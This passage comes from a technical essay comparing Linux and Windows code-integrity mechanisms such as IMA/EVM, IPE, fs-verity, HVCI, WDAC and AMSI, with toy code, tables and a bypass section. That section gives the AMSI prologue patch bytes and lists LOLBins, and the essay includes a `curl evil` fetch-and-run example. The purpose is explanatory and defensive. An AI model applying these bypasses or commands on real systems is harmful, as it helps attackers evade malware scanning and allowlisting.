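  const h = createHmac("sha256", key);
  h.update(file.xattrs["security.ima"]);
  h.update(JSON.stringify(file.inode));
  return h.digest("hex");
}

// Provisioning: label a trusted file with both xattrs.
function label(key, content, inode) {
  const file = { content, inode, xattrs: { "security.ima": sha256(content) } };
  file.xattrs["security.evm"] = evmHmac(key, file);
  return file;
}

// What the kernel would do at exec time in this model.
function appraise(key, file, useEvm) {
  if (sha256(file.content) !== file.xattrs["security.ima"]) return "DENY";
  if (useEvm && evmHmac(key, file) !== file.xattrs["security.evm"]) return "DENY";
  return "ALLOW";
}

const key = randomBytes(32); // held by the kernel; the offline attacker never sees it
const file = label(key, "good binary", { uid: 0, gid: 0, mode: 0o755 });

// Offline attacker: swap the binary and recompute security.ima.
file.content = "evil binary";
file.xattrs["security.ima"] = sha256(file.content);

console.log(appraise(key, file, false)); // ALLOW: IMA alone is fooled
console.log(appraise(key, file, true));  // DENY: security.evm no longer matches
```

The hash function is identical in both runs. The only thing that changes the outcome is whether the reference value is bound to a key the attacker lacks.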

Extended Verification Module (EVM): The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in `security.evm`. Without the EVM key, an offline attacker cannot rewrite a binary and its matching `security.ima` to produce a valid pair.

sequenceDiagram
  participant App as User app
  participant K as Kernel
  participant FS as Filesystem
  participant IMA as IMA
  participant EVM as EVM
  participant TPM as TPM keyring
  App->>K: execve("/usr/bin/foo")
  K->>IMA: bprm_check hook
  IMA->>FS: read file bytes
  IMA->>IMA: compute SHA-256
  IMA->>FS: read security.ima xattr
  IMA->>EVM: verify xattr integrity
  EVM->>FS: read security.evm and full xattr set
  EVM->>TPM: HMAC key from keyring (sealed to PCRs)
  EVM->>EVM: recompute HMAC over xattr set + inode meta
  alt HMAC matches and IMA hash matches
    EVM-->>IMA: ok
    IMA-->>K: allow
    K-->>App: exec proceeds
  else mismatch
    EVM-->>IMA: -EPERM
    IMA-->>K: deny
    K-->>App: -EPERM
  end

IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return -EPERM on a hash mismatch, merged in Linux 3.7 in December 2012 [@lwn-net-articles-488906]. Three and a half years from "we hash files" to "we refuse to run files that fail the hash". The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.

HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

Windows took the equivalent step four years later, but at a different layer. Virtualization-Based Security (VBS) [@learn-microsoft-com-oem-vbs] splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small secure kernel hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.

Virtualization-Based Security (VBS): Windows' Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as "Memory integrity", uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.

Microsoft's HVCI documentation [@learn-microsoft-com-oem-vbs] frames the W^X invariant HVCI enforces on kernel pages: "memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable." A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor.

"HVCI", "Memory Integrity", and "kernel-mode code integrity running in VBS" are the same mechanism. Microsoft's product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled "Enable virtualization-based protection of code integrity", the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as "Secured-Core PC".

flowchart TD
  subgraph VTL0[VTL0: normal Windows kernel]
    P[User process]
    DRV[Driver load request]
    RK[Hypothetical rootkit with SYSTEM]
    K0[NT kernel]
    P --> K0
    DRV --> K0
    RK --> K0
  end
  K0 -->|hypercall: verify driver| HV[Hypervisor]
  RK -.X.-> SK
  HV --> SK
  subgraph VTL1[VTL1: secure kernel]
    SK[Secure kernel]
    CI[Kernel-mode CI verifier]
    SK --> CI
  end
  CI -->|allow / deny| HV
  HV -->|result| K0

IPE (Linux 6.12, November 2024): property-based decisions

The most recent Linux pivot moves further still. Integrity Policy Enforcement [@docs-kernel-org-lsm-ipehtml], upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series (source on GitHub [@github-com-microsoft-ipe]), does not hash files at all. Its kernel documentation is explicit: "Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components." A policy rule looks like:

op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:<hex> action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY

The kernel is not asked "what is the SHA-256 of this file?" at op=EXECUTE time. It is asked "did this file come from a dm-verity device whose root hash matches one of our trusted signatures?" The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.
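The property-lookup model can be illustrated with a toy evaluator for rules shaped like the ones above. This is a sketch, not the kernel's parser: `parsePolicy` and `decide` are hypothetical helpers, the root-hash value `sha256:abc123` is a made-up stand-in for the elided `<hex>`, and top-to-bottom first-match evaluation is assumed.

```javascript
// Toy evaluator for IPE-style rules; not the kernel's parser.
// The root hash below is a made-up placeholder value.
const policyText = `
op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:abc123 action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY
`;

// Split each line into op, action, and a bag of required properties.
function parsePolicy(text) {
  return text.trim().split("\n").map((line) => {
    const rule = { props: {} };
    for (const token of line.trim().split(/\s+/)) {
      const [key, value] = token.split("=");
      if (key === "op" || key === "action") rule[key] = value;
      else rule.props[key] = value;
    }
    return rule;
  });
}

// First matching rule wins; every property on the rule must match.
function decide(rules, op, fileProps) {
  for (const rule of rules) {
    if (rule.op !== op) continue;
    const matches = Object.entries(rule.props).every(([k, v]) => fileProps[k] === v);
    if (matches) return rule.action;
  }
  return "DENY"; // toy default when nothing matches
}

const rules = parsePolicy(policyText);
const fromSignedImage = { dmverity_signature: "TRUE", dmverity_roothash: "sha256:abc123" };
const fromTmp = { dmverity_signature: "FALSE", fsverity_signature: "FALSE" };

console.log(decide(rules, "EXECUTE", fromSignedImage)); // ALLOW
console.log(decide(rules, "EXECUTE", fromTmp));         // DENY
```

Note that `decide` never reads file contents. It only compares properties that were established when the volume or file was set up, which is the per-access saving the paragraph above describes.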

fs-verity (Linux 5.4, November 2019): O(log n) per page

The cryptographic complement is fs-verity [@kernel-org-filesystems-fsverityhtml], upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts'o at Google. The kernel docs describe the trick: "fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size."

The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity's digest directly through the digest_type=verity modifier in its policy language.
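The O(log n) claim is easiest to see in a small Merkle tree. The sketch below uses a binary tree over tiny string "pages" and duplicates the last node on odd levels; these are simplifying assumptions and do not match fs-verity's actual block size, tree fan-out, or on-disk format. All function names are hypothetical.

```javascript
// Toy binary Merkle tree over "pages"; not fs-verity's on-disk format.
const { createHash } = require("node:crypto");
const sha256 = (buf) => createHash("sha256").update(buf).digest();

// Build all levels bottom-up. levels[0] = leaf hashes, last level = [root].
function buildTree(pages) {
  let level = pages.map(sha256);
  const levels = [level];
  while (level.length > 1) {
    const next = [];
    for (let i = 0; i < level.length; i += 2) {
      const right = level[i + 1] ?? level[i]; // duplicate last node if odd
      next.push(sha256(Buffer.concat([level[i], right])));
    }
    levels.push(next);
    level = next;
  }
  return levels;
}

// Sibling hashes needed to verify one page: one per level, so O(log n).
function proofFor(levels, index) {
  const proof = [];
  for (let d = 0; d < levels.length - 1; d++) {
    proof.push(levels[d][index ^ 1] ?? levels[d][index]);
    index >>= 1;
  }
  return proof;
}

// Recompute the path from one page up to the root and compare.
function verifyPage(page, index, proof, root) {
  let hash = sha256(page);
  for (const sibling of proof) {
    hash = index & 1
      ? sha256(Buffer.concat([sibling, hash]))
      : sha256(Buffer.concat([hash, sibling]));
    index >>= 1;
  }
  return hash.equals(root);
}

const pages = Array.from({ length: 8 }, (_, i) => Buffer.from(`page ${i}`));
const levels = buildTree(pages);
const root = levels[levels.length - 1][0];
const proof = proofFor(levels, 5);

console.log(proof.length);                                        // 3 hashes for 8 pages
console.log(verifyPage(pages[5], 5, proof, root));                // true
console.log(verifyPage(Buffer.from("tampered"), 5, proof, root)); // false
```

Verifying page 5 touches three sibling hashes rather than all eight pages. Doubling the file adds one hash to the path, not a second full pass over the data.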

The breakthrough was not a stronger check. It was moving the check out of the attacker's address space.

Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from "xattr next to the file" to "HMAC-keyed xattr, key sealed to TPM PCRs". HVCI moved the kernel-mode verifier from "in the kernel the attacker can patch" to "in a secure kernel the attacker cannot reach without breaking the hypervisor". IPE moved the per-access decision from "recompute a file's hash" to "look up a precomputed property". Fs-verity collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.

The crypto was already strong. The breakthrough was the geometry of where the verifier lived.

By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.

6. The stack today, side by side

Eleven moving parts. Here is how they line up.

Linux	Windows	Layer
IMA appraise + EVM	App Control (WDAC) UMCI	User-mode code integrity
Kernel module signing	App Control + HVCI driver enforcement	Kernel-mode code integrity
fs-verity + dm-verity	HVCI page-level W^X + signed catalogues	Page-level integrity
AppArmor / SELinux	(no direct analogue; closest is AppContainer / ASR)	Mandatory access control
fapolicyd	App Control + AppLocker	User-space allowlist
IPE	App Control (FilePath / hash rules)	Property-based code integrity
(no direct analogue)	AMSI	Script content scan
(no direct analogue)	Smart App Control + ISG	Cloud reputation

The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.

6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

Dimension	Linux IMA + EVM	WDAC (App Control)	IPE
Enforcement layer	VFS / LSM hook (file open, mmap, exec)	PE loader (kernel CI, user-mode CI)	LSM hook on `op=EXECUTE`
Identity primitive	File-content hash or `imasig` / `modsig` / `sigv3`	Authenticode chain, hash, FilePath, or ISG	dm-verity root hash / fs-verity digest
Policy expression	Procedural rules (`func=` / `mask=` / `fsmagic=`)	Signed XML compiled to binary `.p7b`	Signed plain-text DFA
Worst-case per-access	O(n) hash on first access; O(1) cached	O(1) cached; O(n) hash on cache miss	O(1) (properties precomputed)
Fail-closed mode	Yes (appraise)	Yes (enforced)	Yes
Remote-attestation friendly	Yes (TPM PCR 10)	Indirect (Measured Boot logs)	Indirect
Bypass arms race	Whole-disk swap (countered by EVM key sealing)	LOLBins (Microsoft block list + community LOLBAS)	Limited surface (DFA-only)

The IMA policy ABI [@kernel-org-testing-imapolicy] documents the full rule grammar: action [condition ...] where action is one of measure | dont_measure | appraise | dont_appraise | audit | dont_audit | hash | dont_hash, and conditions select on func=, mask=, fsmagic=, fsuuid=, uid=, fowner=, LSM-label predicates, and the all-important appraise_type= modifier that names the signature scheme. IMA template management [@docs-kernel-org-ima-templateshtml] controls what gets recorded per measurement-list entry; the two templates used in practice today are ima-ng (d-ng|n-ng: hash-algo-prefixed digest plus name) and ima-sigv2 (d-ngv2|n-ng|sig: versioned digest plus name plus signature).

WDAC's policy rule reference [@learn-microsoft-com-to-create] defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary .p7b CIPolicy.

The same doc records the defaults that have surprised many operators: "We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts." The Enabled:UMCI option is what flips a WDAC policy from kernel-only to full user-mode enforcement.

flowchart LR
  PE[PE load request] --> AC[Parse Authenticode signature]
  AC --> RM[Match rule set]
  RM --> P[Publisher / cert rule?]
  P -->|hit| AL[Allow]
  P -->|miss| H[Hash rule?]
  H -->|hit| AL
  H -->|miss| FP[FilePath rule?]
  FP -->|hit| AL
  FP -->|miss| MI[Managed Installer?]
  MI -->|hit| AL
  MI -->|miss| ISG[Intelligent Security Graph?]
  ISG -->|hit| AL
  ISG -->|miss| DEF[Default action]
  AL --> BL{"In bypass-list deny?"}
  BL -->|yes| BLK[Block]
  BL -->|no| LOAD[Loader continues]
  DEF --> BLK

6.2 Mandatory access control: AppArmor vs SELinux

Dimension	AppArmor	SELinux
Model	Path-based allowlist per binary	Type-enforcement on subject x object x class
Storage of policy state	In-memory DFA loaded from user space	`security.selinux` xattr + compiled `policy.31`
Granularity	Profile per executable	Per-type, per-class, per-operation
Survives file rename	No (path is the identity)	Yes (xattr travels with inode)
Default-on distros	Ubuntu, openSUSE, SLES	RHEL, Fedora, Oracle Linux, Android, ChromeOS
Authoring tools	`aa-genprof`, `aa-logprof`, `aa-enforce`	`audit2allow`, `semodule`, refpolicy, `udica`

AppArmor's kernel documentation [@docs-kernel-org-lsm-apparmorhtml] describes the model directly: "AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task 'profiles' being created and loaded from user space." A profile reads like a rule file rather than a label algebra:

/usr/sbin/nginx {
  capability net_bind_service,
  /etc/nginx/** r,
  /var/log/nginx/* w,
  /var/www/** r,
  network inet stream,
}

The kernel compiles each profile to a DFA at load time, so policy lookup is O(L) in path length. SELinux's compiled policy uses a hash-table query against compiled type-enforcement rules with an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on what the Wikipedia summary [@en-wikipedia-org-security-enhancedlinux] calls Mandatory Access Control for multi-level security. Smack [@schaufler-ca-com] is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.
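Path-as-identity is easy to demonstrate with the three file rules from the nginx profile above. The sketch below stands in a regular expression for the compiled DFA and assumes AppArmor's glob convention that `*` stops at `/` while `**` crosses it; `globToRegExp` and `allowed` are hypothetical helpers, and other glob forms are not handled.

```javascript
// Toy matcher for the file rules in the nginx profile above.
// Assumes AppArmor's glob convention: "*" stops at "/", "**" crosses it.
function globToRegExp(glob) {
  const escaped = glob.replace(/[.+^${}()|[\]\\?]/g, "\\$&");
  const pattern = escaped
    .replace(/\*\*/g, "\u0000") // protect "**" before handling "*"
    .replace(/\*/g, "[^/]*")
    .replace(/\u0000/g, ".*");
  return new RegExp(`^${pattern}$`);
}

const rules = [
  { glob: "/etc/nginx/**", perms: "r" },
  { glob: "/var/log/nginx/*", perms: "w" },
  { glob: "/var/www/**", perms: "r" },
].map((r) => ({ ...r, re: globToRegExp(r.glob) }));

// Allowlist semantics: deny unless some rule grants the requested permission.
function allowed(path, perm) {
  return rules.some((r) => r.perms.includes(perm) && r.re.test(path));
}

console.log(allowed("/etc/nginx/conf.d/site.conf", "r")); // true
console.log(allowed("/var/log/nginx/access.log", "w"));   // true
console.log(allowed("/var/log/nginx/old/a.log", "w"));    // false: "*" does not cross "/"
console.log(allowed("/etc/shadow", "r"));                 // false: no rule names it
```

Because the decision keys on the path string, moving a file changes which rule applies to it. That is the "survives file rename: no" row in the table above.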

Red Hat's `fapolicyd` is the answer for operators who want App Control-style allowlisting without rebuilding the kernel. Trust is inherited from the RPM database; the daemon sits on the kernel's `fanotify` permission channel and answers ALLOW or DENY on every `open` and `exec`. Per the RHEL hardening guide [@access-redhat-com-fapolicydsecurity-hardening], rule files in `/etc/fapolicyd/rules.d/` are concatenated in lexicographic order into `compiled.rules`. The Red Hat-shipped numbered prefixes are 10 (language interpreters), 20 (dracut), 21 (updaters), 30 (patterns), 40/41/42 (ELF), 70 (trusted languages), 72 (shell), 90 (deny-execute), 95 (allow-open). First-match-wins evaluation means operators adding custom rules must give their file a number lower than 90 to ensure their `allow` is reached before the catch-all deny.
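The ordering rule is worth seeing in miniature. The sketch below models rule files as JavaScript objects rather than real fapolicyd rule syntax; the file names `50-acme.rules` and `92-acme.rules`, the `/opt/acme/bin/tool` path, and the predicates are hypothetical. It assumes only what the paragraph above states: lexicographic concatenation and first-match-wins evaluation.

```javascript
// Toy model of rules.d ordering and first-match-wins evaluation.
// File names and predicates are hypothetical, not fapolicyd rule syntax.
function compile(rulesD) {
  // Lexicographic sort of file names; with two-digit prefixes this is numeric order.
  return Object.keys(rulesD).sort().flatMap((name) => rulesD[name]);
}

function decide(compiled, req) {
  const hit = compiled.find((rule) => rule.match(req));
  return hit ? hit.decision : "no-match";
}

const shipped = {
  "90-deny-execute.rules": [{ decision: "deny", match: (req) => req.perm === "execute" }],
  "95-allow-open.rules": [{ decision: "allow", match: (req) => req.perm === "open" }],
};

const customAllow = [{
  decision: "allow",
  match: (req) => req.perm === "execute" && req.path === "/opt/acme/bin/tool",
}];

// Same custom rule, two different file-name prefixes.
const early = compile({ ...shipped, "50-acme.rules": customAllow });
const late = compile({ ...shipped, "92-acme.rules": customAllow });

const req = { perm: "execute", path: "/opt/acme/bin/tool" };
console.log(decide(early, req)); // allow: the custom rule is reached first
console.log(decide(late, req));  // deny: the 90 catch-all already matched
```

The rule text is identical in both runs. Only the file name decides whether the allow is ever evaluated, which is why a misnumbered custom file fails without any syntax error to point at.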

6.3 Hypervisor-anchored CI: HVCI

HVCI's runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.

Microsoft's HVCI documentation [@learn-microsoft-com-code-integrity] names the dependency: "Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance." Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.

HVCI hardware prerequisites per the OEM VBS guidance [@learn-microsoft-com-oem-vbs]: 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).

6.4 Script-level inspection: AMSI vs Linux's gap

Dimension	AMSI	Linux IMA on scripts
What it sees	Deobfuscated script buffer at execution time	Whole-file content at `open` or `mmap`
Coverage	PowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, Edge	Any file whose `func=FILE_CHECK` rule matches
Provider model	COM `IAntimalwareProvider` per process	None; kernel verifies signature directly
Defends against runtime obfuscation	Yes (sees final buffer)	No (sees file as written)
Trust boundary	Wrong (in-process; patchable by attacker)	Right (kernel-side; attacker cannot patch)

The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and Invoke-Expression evaluations that never touched the filesystem. IMA's hash is final at file write time and tells you exactly nothing about what bash -c "$(curl evil)" will execute.
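
A toy Python illustration of that asymmetry, not a model of either AMSI or IMA: the "file on disk" is a constant loader string, while the text that would actually be evaluated depends on data supplied at run time. All names here are hypothetical.

```python
import base64
import hashlib

# The "file on disk": a tiny loader whose bytes never change.
LOADER_SOURCE = "exec(base64.b64decode(blob).decode())"

def file_hash(source: str) -> str:
    """What a file-content measurement sees: a digest of the bytes as written."""
    return hashlib.sha256(source.encode()).hexdigest()

def evaluated_buffer(blob: bytes) -> str:
    """What an interpreter-side hook would see: the decoded text about to run."""
    return base64.b64decode(blob).decode()

blob_a = base64.b64encode(b"result = 'benign'")
blob_b = base64.b64encode(b"result = 'something else entirely'")

# Same file digest for both runs, different text handed to the interpreter.
digest_a = file_hash(LOADER_SOURCE)
digest_b = file_hash(LOADER_SOURCE)
print(digest_a == digest_b)
print(evaluated_buffer(blob_a) != evaluated_buffer(blob_b))
```

The file digest is identical across both runs, so a file-content check has nothing to distinguish them; only a hook at the evaluation point sees the difference.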

Constrained Language Mode is the reduced PowerShell language mode that App Control forces on systems with UMCI enabled. It blocks reflection (the `[System.Reflection]` namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the `amsiInitFailed` flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.

6.5 Cloud reputation: Smart App Control

Smart App Control [@learn-microsoft-com-business-appcontrol] ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point introduced in Windows 11 version 22H2 to bring application control to home users. On every fresh install SAC starts in evaluation mode for 48 hours. Microsoft's cloud reputation service silently observes the user's app inventory; on enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in. Once disabled by user, policy, or the auto-disable rule, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC is not sufficient.

Three quirks operators must understand. First, evaluation lasts 48 hours and is silent. Second, enterprise-managed (Intune, AAD-joined, GPO-managed) devices auto-disable at evaluation end. Third, disable is one-way: there is no "restart evaluation" path. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. Consumers with a small app footprint and no IT team get a cloud-driven allowlist for free; everyone else is expected to author a policy.

Note: Once Smart App Control is off on a device, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC does not re-enable SAC. Treat enabling SAC as a deployment decision, not a casual toggle.

6.6 fs-verity as the per-file Merkle layer

For the data-at-rest performance story, fs-verity's ioctl(FS_IOC_ENABLE_VERITY) builds the Merkle tree, persists it next to the file, and switches the file to read-only. FS_IOC_MEASURE_VERITY returns the digest in constant time. IMA's policy language gained appraise_type=sigv3 and the digest_type=verity modifier so a rule like

appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity

asks the filesystem for the file's fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.
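
The Merkle idea behind that constant-time digest can be sketched in Python. This is a minimal binary tree over 4 KiB blocks with SHA-256, written for illustration only; it does not reproduce fs-verity's actual tree layout or digest format, and the block size and helper names are assumptions.

```python
import hashlib

BLOCK = 4096  # assumed block size for the sketch

def h(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def build_levels(data: bytes) -> list[list[bytes]]:
    """Return tree levels, leaves first, root level last (binary tree)."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)] or [b""]
    level = [h(b) for b in blocks]
    levels = [level]
    while len(level) > 1:
        if len(level) % 2:                 # pad odd levels by repeating the last node
            level = level + [level[-1]]
            levels[-1] = level
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        levels.append(level)
    return levels

def proof_for(levels, index):
    """Sibling hashes needed to recompute the root from one leaf."""
    path = []
    for level in levels[:-1]:
        sibling = index ^ 1
        path.append((level[sibling], sibling < index))
        index //= 2
    return path

def verify_block(block: bytes, path, root: bytes) -> bool:
    """Recompute the root from one block plus its sibling path."""
    node = h(block)
    for sibling, sibling_is_left in path:
        node = h(sibling + node) if sibling_is_left else h(node + sibling)
    return node == root

data = b"".join(bytes([i]) * BLOCK for i in range(5))   # five distinct blocks
levels = build_levels(data)
root = levels[-1][0]
path = proof_for(levels, 3)
print(verify_block(data[3 * BLOCK:4 * BLOCK], path, root))
```

Verifying one block touches only the hashes on its path to the root, which is why a partial read does not require re-hashing the whole file.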

Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.

7. Bypass arms races

Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.

The AMSI bypass family

The three single-shot techniques from Section 4 -- prologue patch, amsiInitFailed flag flip, library unload -- have all been answered by partial mitigations. Microsoft has hardened AMSI provider loading [@learn-microsoft-com-interface-portal] to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to amsi.dll. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip AmsiUtils.amsiInitFailed. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.

The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in. The simplest in-memory patch overwrites the prologue of `AmsiScanBuffer` with a three-byte sequence that zeroes EAX, the same numeric value as `AMSI_RESULT_CLEAN` (0), and returns:

xor eax, eax    ; 31 C0
ret             ; C3

or the six-byte variant, which returns an error code instead:

mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3

Both variants are detected by modern Defender via the ETW patch detection, but neither requires kernel privileges or a syscall to apply.
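
From the defender's side, the simplest possible check is a byte comparison against the two sequences listed above. The Python sketch below is a toy, not a description of how Defender's ETW-based detection works; the function name and the sample "clean" prologue bytes are hypothetical.

```python
# Byte patterns taken from the two listings above.
PATCH_PATTERNS = {
    "xor eax, eax; ret": bytes.fromhex("31c0c3"),
    "mov eax, 0x80070057; ret": bytes.fromhex("b857000780c3"),
}

def match_patch(prologue: bytes):
    """Return the name of the first known patch the prologue starts with, else None."""
    for name, pattern in PATCH_PATTERNS.items():
        if prologue.startswith(pattern):
            return name
    return None

# Hypothetical bytes standing in for an unmodified function prologue.
clean_prologue = bytes.fromhex("4c8bdc49895b08")
patched_prologue = bytes.fromhex("31c0c3") + clean_prologue[3:]

print(match_patch(clean_prologue))
print(match_patch(patched_prologue))
```

A fixed pattern list like this is trivially evaded by an equivalent instruction sequence, which is one reason the text treats such detection as a partial mitigation.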

The WDAC LOLBin arms race

Microsoft's App Control bypass list [@learn-microsoft-com-bypass-appcontrol] is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, addinutil.exe, aspnet_compiler.exe, bash.exe, wsl.exe, runscripthelper.exe, system.management.automation.dll, and webclnt.dll / davsvc.dll. The community LOLBAS index [@lolbas-project-github-io] widens the field to roughly 200 entries with MITRE ATT&CK technique IDs.

Tooling (the WDAC Wizard, AaronLocker, Microsoft's ConfigCI PowerShell module, CiTool.exe) automates merging the deny set into a base policy and onto Intune. The asymmetry is the bottom line: trust granted at signer granularity, exploitation at binary granularity. The deny list is not a fix; it is a treadmill.
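
The granularity mismatch can be shown with a toy policy evaluator in Python. This is not WDAC's rule engine; the data model, the two-entry deny set, and the choice to check denies first are assumptions made for the sketch.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Binary:
    name: str
    publisher: str

ALLOWED_PUBLISHERS = {"Microsoft"}             # trust granted per signer
DENIED_NAMES = {"mshta.exe", "msbuild.exe"}    # small subset of the block list above

def decide(binary: Binary, apply_deny_list: bool) -> str:
    """Deny entries are checked first; otherwise the publisher rule decides."""
    if apply_deny_list and binary.name.lower() in DENIED_NAMES:
        return "deny"
    if binary.publisher in ALLOWED_PUBLISHERS:
        return "allow"
    return "deny"

mshta = Binary("mshta.exe", "Microsoft")
print(decide(mshta, apply_deny_list=False))
print(decide(mshta, apply_deny_list=True))
```

Without the deny set, the publisher rule alone admits every binary the signer ever shipped; each newly discovered abusable binary needs its own entry, which is the treadmill.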

A LOLBin (living-off-the-land binary) is a trusted binary, often shipped by the OS vendor and signed with the vendor's code-signing certificate, that an attacker repurposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: `mshta.exe` to evaluate HTA scripts, `regsvr32.exe` to execute a remote scriptlet, `installutil.exe` to run code via a designed-for-development assembly loader.

fapolicyd permissive-window

This is not a cryptographic bypass; it is the architectural choice (userspace daemon over fanotify) showing its operational seam. A privileged operator who sets permissive=1 to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI's "the verifier is in another address space" guarantee.
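
A configuration-drift check for the forgotten-permissive case might look like the Python sketch below. It assumes the daemon's configuration is a simple `key = value` text file with `#` comments; the function name and sample text are hypothetical, and a real deployment would read the file from wherever the distribution installs it.

```python
def is_permissive(conf_text: str) -> bool:
    """True if the last uncommented `permissive` setting is non-zero."""
    value = "0"
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()    # drop comments and whitespace
        if "=" not in line:
            continue
        key, _, val = line.partition("=")
        if key.strip() == "permissive":
            value = val.strip()
    return value != "0"

sample = """
# debugging leftover
permissive = 1
"""
print(is_permissive(sample))
```

A check like this covers only the configuration seam; it says nothing about whether the daemon is actually alive, which needs separate monitoring.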

IMA / EVM offline-key attacks

